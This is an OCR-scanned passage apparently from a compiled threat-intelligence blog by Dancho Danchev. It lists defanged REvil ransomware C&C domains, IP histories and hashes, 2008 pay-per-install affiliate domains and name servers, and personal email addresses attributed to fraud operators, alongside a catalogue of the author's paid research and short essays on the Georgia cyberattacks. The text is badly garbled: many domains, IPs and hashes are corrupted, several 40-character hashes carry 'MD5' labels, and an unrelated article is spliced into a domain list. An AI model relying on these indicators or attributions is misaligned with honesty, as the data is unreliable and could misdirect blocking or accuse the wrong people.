somware gang and decided to elaborate more and emphasize on the key fact in specific how 
come that a single ransomware group with several publicly accessible and easy to shut down 
C &C (command and control) server domains including several randomly generated Dark Web 
Onion URLs could easily result in millions of damage and who really remembers a situation 
when getting paid for getting hacked including the basic principle that you should never in- 
teract with cybercriminals but instead should passively and proactively monitor them could 
result in today’s modern and unspoken ransomware growth epidemic and the rise of wrong 
buzz words as for instance ransomware-as-a-corporation where you basically have the bad 
guys obtain initial access to an organization’s network and then hold its information encryp- 
tion leading us to the logical conclusion who on Earth would pay millions of dollars to avoid 
possible bad reputation damage including to fuel growth into a rogue and fraudulent scheme 
as as for instance the encryption of sensitive company information and leaking it to the public 
in exchange for financial rewards. 


[2] 
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Sample REvil ransomware gang publicly accessible C &C (command and control) servers in- 
clude: 


hxxp://decoder[. ]re 

hxxp://decryptor[.]cc - 136[.]243[.]214[.]30; 45[.]138[.]74[.]27 
hxxp://decryptor[.]top 

Related name servers known to have been used in the campaign include: 
hxxp://1-you[. ]njalla[.]no 

hxxp://3-get[. ]njalla[.]fo 

hxxp://2-can[.]njalla[.Jin 

hxxp://1-you[. ]njalla[.]no 


Related responding IPs for hxxp://decryptor[.]cc: 
2021/12/30 - 103[.]224[.]212[.]219 
2021/10/23 - 198[.]58[.]118[.]167 
2021/10/23 - 45[.]79[.]19[.]196 
2021/10/23 - 45[.]56[.]79[.]23 
2021/10/23 - 45[.]33[.]18[.]44 
2021/10/23 - 72[.]14[.]178[.]174 
2021/10/23 - 45[.]33[.]2[.]79 
2021/10/23 - 45[.]33[.]30[.]197 
2021/10/23 - 96[.]126[.]123[.]244 
2021/10/23 - 45[.]33[.]23[.]183 
2021/10/23 - 173[.]255[.]194[.]134 
2021/10/23 - 45[.]33[.]20[.]235 
2021/10/23 - 72[.]14[.]185[.]43 
2021/10/08 - 78[.]41[.]204[.137 
2021/10/03 - 209[.]126[.]123[.]12 
2021/09/24 - 78[.]41[.]204[.]28 
2021/09/03 - 209[.]126[.]123[.]13 
2021/08/19 - 78[.]41[.]204[.138 
2021/08/02 - 81[.]171[.]22[.14 
2021/07/27 - 81[.]171[.]22[.16 
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2021/04/17 - 103[.]224[.]212[.]219 
2020/11/10 - 45[.]138[.]74[.]27 
2020/11/04 - 45[.]138[.]74[.]27 
2020/09/14 - 136[.]243[.]214[.]30 
2020/09/06 - 136[.]243[.]214[.]30 
2020/08/30 - 212[.]22[.]78[.]23 
2020/08/23 - 212[.]22[.]78[.]23 
2020/07/30 - 212[.]22[.]78[.]23 
2020/07/24 - 212[.]22[.]78[.]23 
2020/07/07 - 212[.]22[.]78[.]23 
2020/05/30 - 193[.]164[.]150[.]68 
2020/05/20 - 193[.]164[.]150[.]68 
2020/05/10 - 194[.]36[.]190[.]41 
2020/05/08 - 194[.]36[.]190[.]41 
2020/04/29 - 194[.]36[.]190[.]41 
2020/04/06 - 194[.]36[.]190[.]41 
2020/02/17 - 94[.]103[.]87[.]78 


Related responding IPs for hxxp://decryptor[.]top (185[.]193[.]127[.]162; 
192[.]124[.]249[.]13; 96[.]9[.]252[.]156): 


[4] 


2021/07/12 - 45[.]9[.]148[.]108 
2020/09/18 - 185[.]193[.]127[.]162 
2020/09/15 - 185[.]193[.]127[.]162 
2020/08/07 - 185[.]193[.]127[.]162 
2020/01/16 - 162[.]251[.]120[.]66 
2019/12/23 - 45[.]138[.]96[.]206 
2019/12/12 - 107[.]175[.]217[.]162 
2019/10/07 - 96[.]9[.J252[.]156 
2019/09/04 - 96[.]9[.J252[.]156 
2019/07/15 - 91[.]214[.]71[.]139 
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Related MD5s known to have been involved in the campaign: 
MD5: 57d4ea7d1a9f6éblee6b22262c40c8ef6 

MD5: fe682fad324bd55e3ea9999abc463d76 

MD5: €87402a779262d1a90879f86dba9249acb3dce47 

MD5: 4334009488b277d8ea378a2dba5ec609990f2338 

MD5: 2dccf13e199b60dd2cd52000a26f8394dceccaa6 

Stay tuned! 


1, httpe:/ blogger. googleusercontent. con/ing/a/AVWRsEi72D0G8¢PSSB}26%ea1ReUzTxJ0K000sVbRiOGEpaOhITSOATEQag, XD 
"https: / blogger. googleusercontent .con/ing/a/AV ks jC2508DUnfiH_Es~Gkno02geKXTraUGqblpAiljQySE#2VcJoRLFYU 
"https: //blogger .googleusercontent.con/ing/a/AVvKsEhaBvk_OSUHiGcOVakh35C yp tar Tlvk2aPCB0iUsesxbgjL362_yx 
"https: //blogger .googleusercontent.con/ing// AVvAsEn2TxFZ5vF9Gok1 GAL varXTKISF j23¥Wvin0YUSC11 GlqL.REpELkd 
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18.1.11 (2022-01-24 20:43) 


This presentation aims to detail Dancho Danchev’s perspective into gathering threat intelli- 
gence processing it and enriching and disseminating it to users vendors and organizations 
globally heavily relying on a threat intelligence "rock star" model and methodology where 
the ultimate goal for this case study would be to take down Iran-based hackers and hack- 
ing groups and their entire online operations and attempt to shut them down and take them 
offline citing possible malicious use and actual abuse of international Internet laws and regula- 
tions and ultimatetely attempt to make an impact in terms of tracking them down and offering 
never-published and discussed personally identifiable information on their whereabouts and 
malicious online activities. 


18.1.12 Exposing a Portfolio of Pay Per Install Rogue and Fraudulent and Malicious 
Affiliate Network Domains - An OSINT Analysis (2022-01-24 21:02) 


[1] 


Nembers Area | installation Files 
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Dear blog readers, 
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I’ve decided to share with everyone an in-depth historical OSINT analysis on some of the pri- 
mary pay per install rogue fraudulent and malicious affiliate network based rogue and fraudu- 
lent revenue sharing scheme operating malicious software gangs that are known to have been 
active back in 2008 with the idea to assist everyone in their cyber campaign attribution efforts. 


Sample portfolio of pay per install rogue fraudulent and malicious affiliate network domains 
known to have been in operation in 2008 include: 


vipsoftcash[.]com 
iframevip[.]Jcom 
avicash[.]com 
softmonsters[. ]biz 
cashboon|. ]biz 
loader[.]cc 
luxecash[.]com 
iframepartners[.]Jcom 
installsforyou[.]biz 
topsale2[.]ru 
cashcodec[.]com 
go-go-cash[.]com 
oxocash[.]com 
3xl-cash2[.]com 
3xlpartnership[.]com 
installs4sale[.]com 
profitclick[.Jorg 
megatraffer[.]com 
oemcash[.]Jcom 
goldencashworld[.]biz 
topsale[.Jus 
installsmarket[.]com 
profit-cash[.]biz 
ADWSearch[.]com 
ovocash[.]com 
loadsprofit[.]Jcom 
exerevenue[.]com 
adwaredollars[.]Jcom 
yabucks[.]Jcom 
installing[.]cc 
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installconverter[.]com 
topsale[.]us 
bakasoftware[.]Jcom 
goldencashworld[.]net 
niftystats[.]Jcom 
niftystats[.Jcom 
royal-cash[.]Jcom 
dogmasoftware[.]com 
3xlsoftware[.]com 
rashacash[.]com 
3xltop[.]Jcom 
vipinstall[.Jcn 
installercash[.]Jcom 
spicycodec[.]com 
softwareprofit[.]com 
codecmoney[. ]biz 
trafcash[.]Jcom 
smilecash[.]biz 
bucksloads[.]com 
traffic-converter[.]biz 
eupays[.]Jcom 
seocash[.]us 
vipppc[.]ru 
cashwrestler[.]com 
VipSoftCash[.]Jcom 
vscstatistics[.]com 
vipsoftcashstats[.]com 
Spy-Partners[.]Jcom 
vippirog[.Jcom 
cashbotnet[.]com 
installsforyou[.]biz 
profit-cash[. ]biz 
bestcash[. ]biz 
VisitPay[.]Jcom 


partnerka[.]com 
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spy-partners[.]Jcom 
download4money[.]com 
luxecash[.]net 
iframe911[.]Jcom 
LOADBUCKS[.]BIZ 
Cashpanic[.]com 
longbucks[.]Jcom 
drugrevenue[.]com 
evapharmacy|[.]ru 
bucksloads[.]Jcom 
spydevastator[.]Jcom 
softcash[.]org 
3xlsoftware[.]Jcom 
rashacash[.]com 
3xlcash[.]Jcom 
spicycodec[.]Jcom 
buckster[.]ru 
trafficconverter2[.]biz 
bucksware[.]Jcom 
bucksware-admin[.]com 
mac-codec[.]com 
traffic-converter[.]biz 
klikadult[.]com 
goldencash[.]com 
payperinstall[. Jorg 
pay-per-install[.Jcom 
pay-per-install[.]org 
zangocash[.]com 
iframebiz[.]Jcom 
webmaster-money|[.]org 
cash4toolbar[.]Jcom 
toolbar4cash[.]Jcom 
bluechillies[.]com 
adwaredollars[.]Jcom 
iframestat[.Jorg 
18650 


snapinstalls[.]com 
installercash[.]Jcom 
installcash[.]lorg 
earnperinstall[.Jcom 
dollarsengine[.]Jcom 
installercash[.]Jcom 
vombacash[.]com 
softahead[.]Jcom 
iframestat[.]org 
antispy[.]ws 
sexprofit[.]com 
evapharmacy-login[. ]biz 
vipsoftcash[.]Jcom 
glavmed[.]Jcom 


Sample name servers known to have been used by the same rogue fraudulent and malicious 
pay per install affiliate network domains include: 


ns1[.]Jcgymwmicaa[.]com 
A 
85[.]17[.]136[.]135 
ns1[.]cdpvaqnlod[.]Jcom 
A 
85[.]17[.]136[.]135 
ns1[.]ccytvpbsdg[.]com 
A 
85[.]17[.]136[.]135 
ns1[.]cofkzhtyik[.]Jcom 
A 
85[.]17[.]136[.]135 
ns1[.]cezqtessjo[.]Jcom 
A 
85[.]17[.]136[.]135 
ns1[.]cfsigejclo[.]Jcom 
A 
85[.]17[.]136[.]135 
ns1[.]catjepzcft[.]Jcom 
A 
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85[.]17[.]136[.]135 
ns1[.]Jdhxkycjmrg[.]net 
A 

85[.]17[.]136[.]135 
ns1[.]dglcxlcfmk[.]net 
A 

85[.]17[.]136[.]135 
ns1[.]Jdamaqrgldev[.]net 
A 

85[.]17[.]136[.]135 
ns1[.]dfhatnjfjw[.]net 
A 

85[.]17[.]136[.]135 
ns1[.]Jddzmuatncz[.]net 
A 

85[.]17[.]136[.]135 
ns1[.]cgymwmlcaal[.]com 
A 

72[.]232[.]184[.]10 
ns1[.]cdpvagnlod[.]Jcom 
A 

72[.]232[.]184[.]10 
ns1[.]ccytvpbsdg[.]com 
A 

72[.]232[.]184[.]10 
ns1[.]cbfkzhtyik[.]com 
A 

72[.]232[.]184[.]10 
ns1[.]Jcezqtessjo[.]Jcom 
A 

72[.]232[.]184[.]10 
ns1[.]cfsigejclo[.]Jcom 
A 

72[.]232[.]184[.]10 
ns1[.]Jchyaicpvxo[.]Jcom 
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any email that they provide hacked into and the accounting data sent back to them 


07. [9]The Russia vs Georgia Cyber Attack 

Event of the month? Could be, but just like every “event of the moth" everyone seems to 
be once again restating their "selective retention" preferences. What is selective retention 
anyway? Selective retention is basically a situation where once Russian is attacking another 
country’s infrastructure, you would automatically conclude that it’s Russian FSB behind the 
attacks and consciously and subconsciously ignore all the research and articles telling you oth- 
erwise, namely that the FSB wouldn’t even bother acknowledging Georgia’s online presence, 
at least not directly. Moreover, talking about the FSB as the agency behind the cyberattacks in- 
dicates "selective retention", talking about FAPSI indicates better understanding of the subject. 


In times when cybercrime is getting ever easier to outsource, anyone following the news 
could basically orchestrate a large scale DDoS attack against a particular country in order to 
forward the responsibility to any country that they want to. In Russia vs Georgia, you have a 
combination of a collectivist society that’s possessing the capabilities to launch DDOS attacks, 
knows where and how to order them, and that in times when your country is engaged in a war 
conflict drinking beer instead of DDoS-sing the major government sites of the adversary is not 
an option. 


Selective retention when combined with a typical mainstream media’s mentality to "slice the 
threat on pieces" instead of turning the page as soon as possible, is perhaps the worst possible 
combination. Furthermore, coming up with [10]Social Network analysis of the cyberattacks 
would produce nothing more but a few fancy graphs of over enthusiastic Russian netizen’s 
distributing the static list of the targets. The real conversations, as always, are [11]happening 
in the "Dark Web" limiting the possibilities for open source intelligence using a data mining 
software. Things changed, OPSEC is slowly emerging as a concept among malicious parties, 
whenever some of the "calls for action" in the DDoS attacks were posted at mainstream forums, 
they were immediately removed so that they don’t show up in such academic initiatives 


08. [12]76Service - Cybercrime as a Service Going Mainstream 

The reappearance of the 76Service allowing everyone to log into a web based interface and 
collect all the accounting and financial data coming from malware infected hosts across the 
globe for the period of time for which they’ve bought access, indicates that what used to be 
proprietary services which were supposedly no longer available, are now being operated in a 
do-it-yourself fashion. Goods and products mature into services, so from a cost-benefit analy- 
sis perspective, outsourcing is naturally most beneficial even when it comes to cybercrime 


09. [13]Who’s Behind the Georgia Cyber Attacks? 

If it’s the botnets used in the attacks, they are known, if it’s about who’s providing the hosting 
for the command and control, it’s the "usual suspects", but just like previous discussion of the 
Russian Business Network, it remains questionable on whether or not they work on a revenue- 
sharing basis, are simply providing the anti-abuse hosting, or are the shady conspirators that 
every newly born RBN expert is positioning them to be. 


Cheap conversation regarding the RBN ultimately serves the RBN, and just for the record, 
there’s a RBN alternative in every country, but the only thing that remains the same are the 
customers, tracking the customers means exposing the RBN and the international franchises 
of their services, making it harder to identify their international operations. And given that the 
"tip of the iceberg", namely RBN’s U.S operations remain in tact, talking about taking actions 
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A 

72[.]232[.]184[.]10 
ns1[.]catjepzcft[.]Jcom 
A 

72[.]232[.]184[.]10 
ns1[.]dhxkycjmrg[.]net 
A 

72[.]232[.]184[.]10 
ns1[.]dcorbtfynil[.]Jnet 
A 

72[.]232[.]184[.]10 
ns1[.]dglcxlcfmk[.]net 
A 

72[.]232[.]184[.]10 
ns1[.]detjstniup[.]net 
A 

72[.]232[.]184[.]10 
ns1[.]Jdamargldev[.]net 
A 

72[.]232[.]184[.]10 
ns1[.]dfhatnjfjw[.Jnet 
A 

72[.]232[.]184[.]10 
ns1[.]dbsjxuvijx[.]net 
A 

72[.]232[.]184[.]10 
ns1[.]Jddzmuatncz[.]net 
A 

72[.]232[.]184[.]10 


cgymwmicaa[.Jcom A 195[.]2[.]253[.]247 
cezqtessjo[.]Jcom A 195[.]2[.]253[.]247 
cfsiqejclo[.Jcom A 195[.]2[.]253[.]247 
chyaicpvxo[.Jcom A 195[.]2[.]253[.]247 
cdpvagqnlod[.Jcom A 195[.]2[.]253[.]246 
ccytvpbsdg[.]Jcom A 195[.]2[.]253[.]246 


cbfkzhtyik[.Jcom A 195[.]2[.]253[.]246 
catjepzcft[.Jcom A 195[.]2[.]253[.]246 
http://catjepzcft[.]Jcom 
http://catjepzcft[.Jcom 
http://damaqrgldev[.]net 
http://catjepzcft[.Jcom 
http://damaqrgldev[.]net 
catjepzcft[.]com 
damargldev[.]net 195[.J2[.]253[.]248 
dcorbtfyni[.]net 

A 

195[.]2[.]253[.]248 
damargldev[.]net 

A 

195[.]2[.]253[.]248 
dbsjxuvijx[.]net 

A 

195[.]2[.]253[.]248 
ddzmuatncz[.]net 

A 

195[.]2[.]253[.]248 
dhxkycjmrg[.]net 

A 

195[.]2[.]253[.]249 
dglcxlcfmk[.]net 

A 

195[.]2[.]253[.]249 
detjstniup[.]net 

A 

195[.]2[.]253[.]249 
dfhatnjfjw[.]net 

A 

195[.]2[.]253[.]249 
dhxkycjmrg[.]net 

NS 
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ns1[.]dhxkycjmrg[.]net 
ns1[.]dhxkycjmrg[.]net 
A 

72[.]232[.]184[.]10 
ns1[.]dhxkycjmrg[.]net 
A 

85[.]17[.]136[.]135 
dcorbtfynil[.]net 

NS 
ns1[.]dhxkycjmrg[.]net 
dglcxlcfmk[.]net 

NS 
ns1[.]dhxkycjmrg[.]net 
detjstniup[.]net 

NS 
ns1[.]dhxkycjmrg[.]net 
damargldev[.]net 

NS 
ns1[.]dhxkycjmrg[.]net 
dfhatnjfjw[.]net 

NS 
ns1[.]dhxkycjmrg[.]net 
dbsjxuvijx[.]net 

NS 
ns1[.]dhxkycjmrg[.]net 
ddzmuatncz[.]net 

NS 
ns1[.]dhxkycjmrg[.]net 


Related pay per install rogue fraudulent and malicious domains known to have been used 
back in 2008 for various rogue fraudulent and malicious purposes include: 


drawn-cash[.]Jcom 
vippay[.]Jcom 
bucksware-admin[.]Jcom 
wwwl[.]system-protector[.]net 
sys-scan-1[.]biz 
sys-scan-wiz[.]biz 
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topsale2[.]ru 

earning4u[.]com 

flashdollars[.]com 

installing[.]cc 

siteload[.]cn 

A 

94[.]247[.]2[.]54 

hostnsload[.]cn 

siteinstall[.Jcn 

hostnsinstall[.Jcn 

jjupsport[.]ru 

installz[.Jcn 

adware-help[.]com 

fliporn[.]Jcom 

dailybucks[.]org 

installloader[.Jcom 

installaga[.]cn 

georgenatas[.]in 

naemnitibo[.]in 

tirosanare[.]in 

mialo-goodle[.]info 

nailcash[.]Jcom 
ultraantivirus2009[.]Jcom 
nailcash[.]Jcom A 64[.]86[.]17[.]9 
virusalarmpro[.]Jcom A 64[.]86[.]17[.]9 
vmfastscanner[.]com A 64[.]86[.]17[.]9 
mysuperviser[.]Jcom A 64[.]86[.]17[.19 
virusmelt[.]Jcom A 64[.]86[.]17[.]9 
payvirusmelt[.Jcom A 64[.]86[.]17[.]9 
updvmfnow[.]cn A 64[.]86[.]17[.]9 
mysupervisor[.]net A 64[.]86[.]17[.19 


Related personal email accounts known to have been used for various related pay per install 
rogue fraudulent and malicious affiliate network domain registrations include: 


pvc6168@sina[.]com 
windinv@yahoo[.]com 
new@loveplus[.]in 
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johnson8402@post[.]com 
Imunozv1@live[.]Jcom 
ididid828@gmail[.]Jcom 
onlineprivacy@aol[.]Jcom 
alex@bnetworks[.]us 
milen[.]Jradumilo@gmaill[.]com 
ztao72945@gmaill.]Jcom 
redsunray@hotmail[.]com 
WINDINV@YAHOO[.]COM 
tvmt2000@yahoo[.]com 
325214476@qq[.]Jcom 
adxluxe@gmaill.]Jcom 
SexPicker@gmail[.]Jcom 
domainaccount@protonmail[.Jcom 
ancientholdings@fastmaill[.]fm 
newseowork12@gmail[.]Jcom 
oem[.]Jmyrian@gmail[.Jcom 
229848501@qq[.]Jcom 
bdmailhere@gmail[.]Jcom 
danny9@gmaill[.Jcom 
phone49012@yahoo[.]com 
miok2001@maill[.]ru 
zuev@cmedia-online[.]ru 
daniell[. ]bastien@gmail[.Jcom 
domainadmin1900@gmail[.Jcom 
larsonown@gmail[.]Jcom 
ppcseo2@gmail[.Jcom 

simal[. ]jogminaite@inbox[. ]It 
topsaleus@gmail[.]Jcom 


Stay tuned! 


1. https://blogger.googleusercontent.com/img/a/AVVXsEiBAWg9eKF3jKcRtvgwEDjLsqQvwL32_181BxY13pQP349UnV60Lo6yq- 
OnA19kbn644ZSE4i -GXwxgkKwcrnnkOc-U2WdGEHSUbthQIxhWbUgxk 
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18.1.13 Who Wants to Support My Work Commercially? (2022-01-25 22:39) 


[1] 


Folks, 


Who wants to dive deep into some of my latest commercially available research and stay on 
the top of their OSINT/cybercrime research and threat intelligence gathering game that also 
includes their team and organization? 


Check out my latest project [2]here where I’m currently doing my best to guarantee and deliver 
approximately 12 unique articles and OSINT research and analysis on a daily basis including 
the following currently active portfolio of research which | made available online exclusively for 
commercial purposes and to further empower you and your team and organization: 


A Compilation of Currently Active and Related Scams Scammer Email Addresses - An OS- 
INT Analysis 


A Compilation of Currently Active Cyber Jihad Themed Personal Email Addresses - An OS- 
INT Analysis 


A Compilation of Currently Active Full Offline Copies of Cybercrime-Friendly Forum Com- 
munities - Direct Technical Collection Download -[RAR] 


A Compilation of Personally Identifiable Information on Various Iran-based Hacker Groups 
and Lone Hacker Teams - Direct Technical Collection Download - [RAR] 


A Koobface Botnet Themed Infographic Courtesy of my Keynote at CyberCamp - A Photo 
Advanced Bulletproof Malicious Infrastructure Investigation - WhoisXML API Analysis 


Advanced Mapping and Reconnaissance of Botnet Command and Control Infrastructure 
using Hostinger’s Legitimate Infrastructure - WhoisXML API Analysis 


Advanced Mapping and Reconnaissance of the Emotet Botnet - WhoisXML API Analysis 


Assessing The Computer Network Operation (CNO) Capabilities of the Islamic Republic of 
Iran - Free Research Report 


Astalavista Security Newsletter - 2003-2006 - Full Offline Reading Copy 


Compilations of Personally Identifiable Information Including XMPP/Jabber and Personal 
Emails Belonging to Cybercriminals and Malicious Threat Actors Internationally - An OSINT 
Analysis 
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Cyber Intelligence - Personal Memoir - Dancho Danchev - - Download Free Copy Today! 


Cybercriminals Impersonate Legitimate Security Researcher Launch a Typosquatting C &C 
Server Campaign - WhoisXML API Analysis 


Dancho Danchev - Cyber Intelligence - Personal Memoir - Direct Download Copy Available 


Dancho Danchev’s “A Qualitative and Technical Collection OSINT-Enriched Analysis of the 
Iranian Hacking Scene Through the Prism of the Infamous Ashiyane Digital Security Team” 
Report - [PDF] 


Dancho Danchev’s “Assessing The Computer Network Operation (CNO) Capabilities of the 
Islamic Republic of Iran” Report - [PDF] 


Dancho Danchev’s “Astalavista Security Group - Investment Proposal” Presentation - A 
Photos Compilation 


Dancho Danchev’s “Building and Implementing a Successful Information Security Policy” 
White Paper - [PDF] 


Dancho Danchev’s “Cyber Jihad vs Cyberterrorim - Separating Hype from Reality” Presen- 
tation - [PDF] 


Dancho Danchev’s “Cyber Jihad vs Cyberterrorism - Separating Hype from Reality - A 
Photos Compilation 


Dancho Danchev’s “Exposing Koobface - The World’s Largest Botnet” Presentation - A 
Photos Compilation 


Dancho Danchev’s “Exposing Koobface - The World’s Largest Botnet” Presentation - [PDF] 


Dancho Danchev’s “Exposing the Dynamic Money Mule Recruitment Ecosystem” Presen- 
tation - A Photos Compilation 


Dancho Danchev’s “Exposing the Dynamic Money Mule Recruitment Ecosystem” Presen- 
tation - [PDF] 


Dancho Danchev'’s “Intell on the Criminal Underground - Who’s Who in Cybercrime for ” 
Presentation - [PDF] 


Dancho Danchev’s “Intell on the Criminal Underground - Who’s Who in Cybercrime for ?” 
- A Photos Compilation 


Dancho Danchev’s - Cybercrime Forum Data Set - Free Direct Technical Collection Down- 
load Available - GB - [RAR] 


Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 


Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
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¢ Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 

¢ Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 

¢ Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 

¢ Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 

¢ Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 

¢ Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 

¢ Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 

¢ Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 

¢ Dancho Danchev’s Comeback Livestream Today - Join me on Facebook Live! 
¢ Dancho Danchev’s CV - Direct Download Copy Available 


¢ Dancho Danchev’s Cybercrime Forum Data Set for - Upcoming Direct Technical Collection 
Download Available 


* Dancho Danchev’s Primary Contact Points for this Project - Email/XMPP/Jabber/OMEMO 
and PGP Key Accounts 


¢ Dancho Danchev’s Privacy and Security Research Compilation - Medium Account Research 
Compilation - [PDF] 


¢ Dancho Danchev’s Private Party Videos - Direct Video Download Available 

¢ Dancho Danchev’s Private Party Videos - Part Three - Direct Video Download Available 
¢ Dancho Danchev’s Private Party Videos - Part Two - Direct Video Download Available 

¢ Dancho Danchev’s Random Conference and Event Photos - A Compilation 


¢ Dancho Danchev’s Random Personal Photos and Research Photos Compilation - A Compi- 
lation 


* Dancho Danchev’s Research for Unit-.org - Direct Download Copy Available 
* Dancho Danchev’s Research for Webroot - Direct Download Copy Available 
¢ Dancho Danchev’s RSA Europe Conference Event Photos - A Photos Compilation 


¢ Dancho Danchev’s Security Articles and Research for ZDNet’s Zero Day Blog - Full Offline 
Copy Available - [PDF] 


¢ Dancho Danchev’s Security/OSINT/Cybercrime Research and Threat Intelligence Gather- 
ing Research Compilations - [PDF] 


¢ Dancho Danchev’s Twitter Archive - Direct Download - [ZIP] 


* Dancho Danchev’s Upcoming Cybercrime Research OSINT and Threat Intelligence Gath- 
ering E-Book Titles - Sample E-Book Covers 


¢ Dancho Danchev’s Video Keynote Presentation - “Exposing Koobface - The World’s Largest 
Botnet” - Video Download Available 


18660 


Dancho Danchev’s Random Personal Photos and Research Photos Compilation - Part Three 
- A Compilation 


Dancho Danchev’s Random Personal Photos and Research Photos Compilation - Part Two 
- A Compilation 


Exposing A Virus Coding Group - An OSINT Analysis 


Exposing a Boutique Fraudulent and Rogue Cybercrime-Friendly Forum Community - 
WhoisXML API Analysis 


Exposing a Currently Active “Jabber ZeuS” also known as “Aqua ZeuS” Gang Personal 
Email Portfolio - An OSINT Analysis 


Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio - An 
OSINT Analysis 


Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio - Part 
Two - An OSINT Analysis 


Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio - Part 
Four - An OSINT Analysis 


Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio - Part 
Three - An OSINT Analysis 


Exposing a Currently Active CoolWebSearch Rogue and Malicious IPs Portfolio - An OSINT 
Analysis 


Exposing a Currently Active CoolWebSearch Rogue and Malicious IPs Portfolio - Part Two - 
An OSINT Analysis 


Exposing a Currently Active Cyber Jihad Domain Portfolio - An OSINT Analysis 
Exposing a Currently Active Cyber Jihad Domains Portfolio - WhoisXML API Analysis 
Exposing a Currently Active Cyber Jihad Social Media Twitter Accounts - An OSINT Analysis 


Exposing a Currently Active Domain Portfolio Belonging to Iran’s Mabna Hackers - An 
OSINT Analysis 


Exposing a Currently Active Domain Portfolio Managed and Operated by Members of the 
Ashiyane Digital Security Team - WhoisXML API Analysis 


Exposing a Currently Active Domain Portfolio of Currently Active High-Profile Cybercrimi- 
nals Internationally - WhoisXML API Analysis 


Exposing A Currently Active Domain Portfolio of Cybercrime Friendly Forum Communities 
- An OSINT Analysis 


Exposing A Currently Active Domain Portfolio of Cybercrime Friendly Forum Communities 
- Part Two - An OSINT Analysis 


Exposing A Currently Active Domain Portfolio of Cybercrime Friendly Forum Communities 
- Part Three - An OSINT Analysis 
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¢ Exposing a Currently Active Domain Portfolio of Tech Support Scam Domains - An OSINT 
Analysis 


¢ Exposing a Currently Active Free Rogue VPN Domains Portfolio Courtesy of the NSA - 
WhoisXML API Analysis 


¢ Exposing a Currently Active Iran-Based Lone Hacker and Hacker Group’s Personal Web 
Sites Full Offline Copies - Direct Technical Collection Download - [RAR] 


¢ Exposing a Currently Active Kaseya Ransomware Domains Portfolio - WhoisXML API Anal- 
ysis 


¢ Exposing a Currently Active Koobface Botnet C &C Server Domains Portfolio - Historical 
OSINT 


¢ Exposing a Currently Active List of Iran-Based Hacker and Hacker Team’s Handles - An 
OSINT Analysis 


¢ Exposing a Currently Active List of Iran-Based Hacker and Hacker Team’s Handles - Part 
Two - An OSINT Analysis 


¢ Exposing a Currently Active List of Iran-Based Hacker and Hacker Team’s Handles - Part 
Three - An OSINT Analysis 


¢ Exposing a Currently Active List of Iran-Based Hacker and Hacker Team’s Handles - Part 
Two - An OSINT Analysis 


¢ Exposing a Currently Active Money Mule Recruitment Domain Registrant Portfolio - Histor- 
ical OSINT 


¢ Exposing a Currently Active NSO Spyware Group’s Domain Portfolio - WhoisXML API Anal- 
ysis 


¢ Exposing a Currently Active Portfolio of Personal Web Sites Belonging to Iran-Based Hack- 
ers and Hacking Teams and Groups - An OSINT Analysis 


¢ Exposing a Currently Active Portfolio of Personal Web Sites Belonging to Iran-Based Hack- 
ers and Hacking Teams and Groups - Part Two - An OSINT Analysis 


¢ Exposing a Currently Active Portfolio of Ransomware-Themed Protonmail Personal Email 
Address Accounts - An OSINT Analysis 


* Exposing a Currently Active Portfolio of RAT (Remote Access Tool) C &C Server IPs and 
Domains - An OSINT Analysis 


¢ Exposing a Currently Active Rock Phish Domain Portfolio - Historical OSINT 


¢ Exposing a Currently Active SolarWinds Rogue and Malicious C &C Domains Portfolio - An 
OSINT Analysis 


¢ Exposing a Currently Active WannaCry Ransomware Domains Portfolio - WhoisXML API 
Analysis 


¢ Exposing a Personal Photo Portfolio of Iran Hack Security Team - An OSINT Analysis 


Exposing A Personal Photos Portfolio of Ashiyane Digital Security Group Team Members - 
An OSINT Analysis 
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against their international operations in countries where cybercrime law is still pending, is 
yet another quality research into the topic building up the pile of research into the very same 
segments of the very same ISPs. 


Just for the record - these "very same ISPs" are regular readers of my blog, and if you 
analyze their activities, they’re definitely reading yours too, ironically, surfing through gate- 
ways residing within their netblock that are so heavily blacklisted due to the guestbook and 
forum spamming activities that their bad reputation usually ends up in another massive 
blackhat SEO campaign exposed. 


10. [14]Guerilla Marketing for a Conspiracy Site 
Conspiracy theorists may in fact have a new wallpaper to show off with 


11. [15]Banker Malware Targeting Brazilian Banks in the Wild 

When misinformed and not knowing anything about a particular underground segment, a po- 
tential cybercriminal would stick to using such primitive compared to the sophisticated banker 
malware kits currently in the wild. These sophisticated banker malware kits are often coming 
in a customer-tailored proposition, with their price increasing or decreasing based on the 
specific module to be included or excluded. For instance, a module targeting all the U.S banks 
that has been put in a "learning mode" long before it was made available to the customers can 
be requested and is often available with the business model build around the customer’s wants 


12. [16]Compromised Cpanel Accounts For Sale 

Despite the massive SQL injection attacks, accounting data for Cpanel accounts coming 
from malware infected hosts seems to be once again coming into play, which isn’t surprising 
given the filtering capabilities and log parsing tools today’s botnet masters are empowered 
with. These very same compromised Cpanel accounts and the associated domains often 
end up so heavility abused that it’s tactics like these that are driving the underground 
multitasking mentality, namely, abusing a single compromised account for each and every 
malicious online activity you can think of - even hosting banners for their blackhat SEO services 


13. [17]A Diverse Portfolio of Fake Security Software - Part Two 

In August we saw a peek of fake security software, neatly typosquatted domains whose 
authors earn revenue each and every time someone installs the software. The vendors 
behind this software are forwarding the entire process of driving traffic to those excelling 
in aggregating traffic and abusing it. As anticipated, underground multitasking started 
taking place within the fake security software domains, with the people behind them intro- 
ducing client-side exploits in order to improve the monetization of the traffic coming to the sites 


14. [18]DIY Botnet Kit Promising Eternal Updates 

